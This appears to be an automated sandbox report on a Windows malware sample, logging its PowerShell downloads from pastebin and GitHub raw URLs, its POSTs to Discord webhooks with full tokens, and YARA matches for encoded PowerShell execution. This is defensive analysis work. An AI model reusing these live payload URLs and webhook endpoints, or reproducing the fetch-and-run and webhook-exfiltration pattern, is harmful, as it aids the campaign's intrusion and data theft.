Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Content-Type: application/jsonHost: discord.comContent-Length: 297Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Content-Type: application/jsonHost: discord.comContent-Length: 297Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_006720D0 MultiByteToWideChar,MultiByteToWideChar,InternetOpenW,GetLastError,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,MessageBoxW,Sleep,VirtualAlloc,VirtualFree,Concurrency::cancel_current_task,0_2_006720D0
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /labail300/psapi/main/modmenu.txt HTTP/1.1User-Agent: DownloaderHost: raw.githubusercontent.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Content-Type: application/jsonHost: discord.comContent-Length: 212Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 928E:1FAF94:22FD91A:26C82AF:670E7404Accept-Ranges: bytesDate: Tue, 15 Oct 2024 13:54:12 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdal2120091-DFWX-Cache: MISSX-Cache-Hits: 0X-Timer: S1729000453.642054,VS0,VE151Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 6b3c7bc31e0ff925eb9dd89267d80fb5f0da6f0fExpires: Tue, 15 Oct 2024 13:59:12 GMTSource-Age: 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 13:54:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000492x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F69Dnzw0wq7RtVEVpxbkNq5hZzTXGWno7esEgWayh6fA9Pyjs1jcnbLrvJVolv96jC%2FyNTHFmtbAl%2FDU9AmsmkW%2BrbKA%2F1Lzf%2B4Vf8kAAPAO%2BV%2Br5BSN3%2BBk7Bo%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=69022a55f2b8783d0d63679e0838c8b202ffbc2e-1729000491; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=WlDXhfnKcSPqw_2Ei8YQ4SyVmTX.S.GQxnEfCc7UuGo-1729000491258-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304dadbbc04692-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 13:55:18 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000520x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JUs1QElVF70VthSakJsafJd6%2Bo3mCuroQWk81tyvnvn9PPhLNUkwtJLtsikOZ11fRurFumyk%2FqU3Ux0zOzsxl6HAJNzraythxH%2Bb5y6COTvV2preqRk%2F3GmCQxc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=760c3f7f9a8f6b9971b915706863cede5079f7ea-1729000518; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=cSsEV_42yE8w9zOR.P2k92ne3S_DUmteHnQ3wLl0CcU-1729000518872-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304e5a3a3e4656-DFW
Source: powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000004.00000002.1818087157.0000000005463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2104984117.00000204F4551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E4873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E62C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E46FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE6AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0E0107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000012.00000002.2072699759.00000204E492E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E48FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.1812665851.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.2227532640.000001D0F64B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coE
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000004.00000002.1812665851.00000000043F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000012.00000002.2072699759.00000204E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpT
Source: powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000012.00000002.2072699759.00000204E4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE7D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE7D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1812665851.0000000004BE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1818087157.0000000005463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2104984117.00000204F4551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000012.00000002.2072699759.00000204E485A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE69E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000012.00000002.2072699759.00000204E485A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE69E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0E0110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0E0107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.1812665851.0000000004547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E492E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.0000000001311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
Source: powershell.exe, 00000004.00000002.1812665851.0000000004639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: Lm9IJ4r9oO.exeString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt
Source: powershell.exe, 00000004.00000002.1812613044.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1820569925.000000000740C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1812227809.0000000002A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt-usebasi
Source: powershell.exe, 00000004.00000002.1812665851.0000000004547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txtP
Source: powershell.exe, 00000012.00000002.2072699759.00000204E489E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E4873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE6AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.0000000001311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt05
Source: Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt99u
Source: Lm9IJ4r9oO.exe, 00000000.00000003.1418176354.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000003.1418283397.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483561322.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtg
Source: Lm9IJ4r9oO.exe, 00000000.00000003.1418176354.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000003.1418283397.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483561322.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtn
Source: Lm9IJ4r9oO.exeString found in binary or memory: https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtpowershell
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62868
Source: unknownNetwork traffic detected: HTTP traffic on port 62872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62864
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62862 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:62864 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.3:62866 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:62868 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.3:62870 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62871 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:62872 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_4116.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7688.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4116, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_006720D00_2_006720D0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_006725F00_2_006725F0
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_006732300_2_00673230
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0068D31A0_2_0068D31A
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0068EBB90_2_0068EBB9
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_0068645C0_2_0068645C
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_00680DB00_2_00680DB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FBE7804_2_07FBE780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FB1EC84_2_07FB1EC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FBE7804_2_07FBE780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081080404_2_08108040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081078404_2_08107840
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0810D9C84_2_0810D9C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08102A804_2_08102A80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081013F04_2_081013F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081045A04_2_081045A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081065E04_2_081065E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0810CE184_2_0810CE18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0810CE084_2_0810CE08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08106F604_2_08106F60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08137C204_2_08137C20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0813E7D04_2_0813E7D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0813EBAA4_2_0813EBAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0813F6884_2_0813F688
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081579F04_2_081579F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081B91D04_2_081B91D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081B9A784_2_081B9A78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081B9A674_2_081B9A67
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081B41804_2_081B4180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081C65384_2_081C6538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081CEB284_2_081CEB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081CBCE84_2_081CBCE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081C55884_2_081C5588
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081CC5C84_2_081CC5C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_082059904_2_08205990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0828BDE84_2_0828BDE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08288BF14_2_08288BF1
